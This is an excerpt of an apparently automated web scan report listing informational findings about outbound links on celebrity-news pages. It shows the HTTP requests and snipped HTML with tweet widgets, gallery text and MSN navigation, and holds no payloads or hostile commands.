<img src="http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/LoBosworth">LoBosworth</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/LoBosworth/statuses/31474891412738048">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/racheljosephf">@racheljosephf</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474364587180033">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/barbara230">@barbara230</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474068645478400">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473906485297152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a> Egyptian activists are cobbling together their own internet: <a href="http://bit.ly/e3toNb">http://bit.ly/e3toNb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473844573179904">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/mccordalex">mccordalex</a>: <a href="http://twitter.com/Punch800">@Punch800</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/mccordalex/statuses/31471195719208960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/iamdiddy">iamdiddy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/31469852891807744">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/SarahKSilverman">SarahKSilverman</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/SarahKSilverman/statuses/31469730384580608">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/MirandaBuzz">MirandaBuzz</a>: A picture of towel art in the hotel. The elephant in the room. ;) <a href="http://yfrog.com/hsi3mlfj">http://yfrog.com/hsi3mlfj</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/MirandaBuzz/statuses/31469606199623680">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468574493114368">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>: Hate when that happens! Lol RT <a href="http://twitter.com/CarlaDiBello">@CarlaDiBello</a> RT <a href="http://twitter.com/PeterGriffinn">@PeterGriffinn</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468288559030272">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.361. http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /movies/celeb-inc-for-jan-28-11106.gallery

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /movies/celeb-inc-for-jan-28-11106.gallery?gt1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 16:59:09 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 1
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="medium" content="image" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Original/45288_Original.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.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.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/45288_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/45288_Original.jpg" alt="By Michelle LanzMaking it in the competitive world of showbiz takes a lot more than talent these days; you need a recognizable name, a diversified brand and shameless self-promotion. Click through to see which celebs are selling products and selling out this season. They already have their famous name on books, perfumes, TV shows and even their own credit card, but now the Kardashian sisters are venturing into the lucrative business of Silly Bandz. Yep, now you can get your wrists on these trendy plastic bracelets with shapes that include shoes, perfumes, the letter K and even silhouettes of the girls. And yes, Khloe's band is slightly taller than the others. Hey those Silly Bandz manufacturers sure are sticklers for accuracy.RELATED: Celebs Who Need an Exorcism" /></span>
...[SNIP]...
<P ALIGN="LEFT">They already have their famous name on books, perfumes, TV shows and even their own credit card, but now the Kardashian sisters are venturing into the lucrative business of <A HREF="http://www.buzzfeed.com/ashleybaccam/kardashian-silly-bandz" TARGET="_blank">Silly Bandz</A>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288%26ocid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=sillybandz&u=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Reddit</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/24074_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/NickCannon">NickCannon</a>: <a href="http://twitter.com/TheBatkave">@TheBatkave</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/NickCannon/statuses/31746607615574016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4422_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/alydenisof">alydenisof</a>: <a href="http://twitter.com/wendyhagen">@wendyhagen</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/alydenisof/statuses/31744920150614016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4145_Module1x1_634273984962298019.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/yokoono">yokoono</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/yokoono/statuses/31743517785071616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23114_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Sn00ki">Sn00ki</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Sn00ki/statuses/31737381589614592">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a></a>: Brand new live at 11:30 after ATL finale with <a href="http://twitter.com/kimzolciak">@kimzolciak</a> and her man Kroy! RT:<a href="http://twitter.com/mikelizonn">@mikelizonn</a>: <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31734736913170432">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/MsBrandi17">@MsBrandi17</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729553827172352">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729214356979713">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/Akeel93">@Akeel93</a>: "<a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31727445837090816">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: :) RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a> EVERY1 tune in2 the 90 minute long SEASON FINALE of RHOA 10pm on Bravo & <a href="http://twitter.com/kimzolciak">@kimzolciak</a> & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31726145497989121">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/30371_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Bethenny">Bethenny</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Bethenny/statuses/31719343947522049">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Lol RT <a href="http://twitter.com/AshNHartz">@AshNHartz</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Are you & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716672863731714">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: I was 3 months in this pic RT <a href="http://twitter.com/Please_Stand_By">@Please_Stand_By</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> This is you recently pregnant? <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716118221561856">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31716032452231168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712954776821760">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Opening for a Huge mega star! I'm beyond excited! RT <a href="http://twitter.com/iutrav">@iutrav</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712647732797440">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Ur a doll! RT <a href="http://twitter.com/JoshGottlieb">@JoshGottlieb</a>: Fun day! Thank you <a href="http://twitter.com/BrielleZolciak">@BrielleZolciak</a>, <a href="http://twitter.com/arianazolciak">@arianazolciak</a> <a href="http://twitter.com/biermann71">@biermann71</a> and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712300427644928">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/AtlantaPlaces">@AtlantaPlaces</a>: Club Life is buzzing again: <a href="http://sch.mp/0jHde">http://sch.mp/0jHde</a> - RT <a href="http://twitter.com/KingLj11">@KingLj11</a> Me and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> @ club Life!! <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31711564050472961">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: On plane wish i could call in!RT <a href="http://twitter.com/lxnewyork">@lxnewyork</a> Getting ready to chat with our favorite sunday morning show <a href="http://twitter.com/lxtvopenho">@lxtvopenho</a>... <a href="http://tl.gd/8g30qb">http://tl.gd/8g30qb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705598416392194">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: So happy. Flying <a href="http://twitter.com/continental">@continental</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705092302315520">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/Banshee_Song">@Banshee_Song</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31690324585742336">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/buddyhead">@buddyhead</a> <a href="http://youtu.be/fX_120DMFDQ">http://youtu.be/fX_120DMFDQ</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31688081048342528">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/ipierce89">@ipierce89</a> Oh no! Yur not DRIVING <a href="http://twitter.com/OMGitsjessielee">@OMGitsjessielee</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31674584327528449">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31672009905672192">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31671556916645888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rzrachelzoe">rzrachelzoe</a>: RT <a href="http://twitter.com/prabalgurung">@prabalgurung</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rzrachelzoe/statuses/31667825831579649">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.362. http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /music/chris-brown-completes-domestic-violence-program-1594072.story

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /music/chris-brown-completes-domestic-violence-program-1594072.story?GT1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:52:01 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="Search.Image" content="http://static.wonderwall.com/photos/Module1x1/41220_Module1x1.jpg" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Module1x1/41220_Module1x1.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.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.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.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.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
